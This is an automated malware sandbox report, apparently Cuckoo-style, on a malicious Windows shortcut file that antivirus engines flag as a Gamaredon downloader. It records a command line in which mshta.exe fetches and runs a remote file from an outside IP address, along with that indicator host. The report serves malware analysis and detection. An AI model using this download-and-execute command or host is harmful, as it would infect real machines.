Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 10, 2024, 6:23 p.m. | Aug. 10, 2024, 6:26 p.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted.
IP Address | Status | Action |
---|---|---|
5.39.254.55 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49164 -> 5.39.254.55:80 | 2027257 | ET INFO Dotted Quad Host RTF Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address |
suspicious_request | GET http://5.39.254.55/sp_08.08/days.rtf |
request | GET http://5.39.254.55/sp_08.08/days.rtf |
file | C:\Users\test22\AppData\Local\Temp\49fd9bf8a9029185e03f469c388fbe3c.lnk |
cmdline | "C:\Windows\System32\mshta.exe" http://5.39.254.55/sp_08.08/days.rtf /f |
Rule | Description |
---|---|
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |
host | 5.39.254.55 |
Lionic | Trojan.WinLNK.Nioc.4!c |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | LNK.APT.43736 |
VIPRE | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Arcabit | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | LNK/TrojanDownloader.Pterodo.G |
Avast | LNK:Agent-CR [Trj] |
Kaspersky | HEUR:Trojan.WinLNK.Gamaredon.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.0B26EB2A |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Emsisoft | Heur.BZC.YAX.Nioc.1.0B26EB2A (B) |
F-Secure | Malware.LNK/Dldr.Agent.VPTN |
FireEye | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Sophos | Troj/DownLnk-X |
Avira | LNK/Dldr.Agent.VPTN |
MAX | malware (ai score=83) |
Microsoft | Trojan:Win32/ShortSeek.E!dha |
ZoneAlarm | HEUR:Trojan.WinLNK.Gamaredon.gen |
GData | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Varist | LNK/ABTrojan.UXKK- |
Zoner | Probably Heur.LNKScript |
Tencent | Win32.Trojan.Gamaredon.Rsmw |
huorong | Trojan/LNK.Starter.r |
Fortinet | LNK/Agent.VPTN!tr |
AVG | LNK:Agent-CR [Trj] |
alibabacloud | Trojan[downloader]:Win/ShortSeek.E9hyq |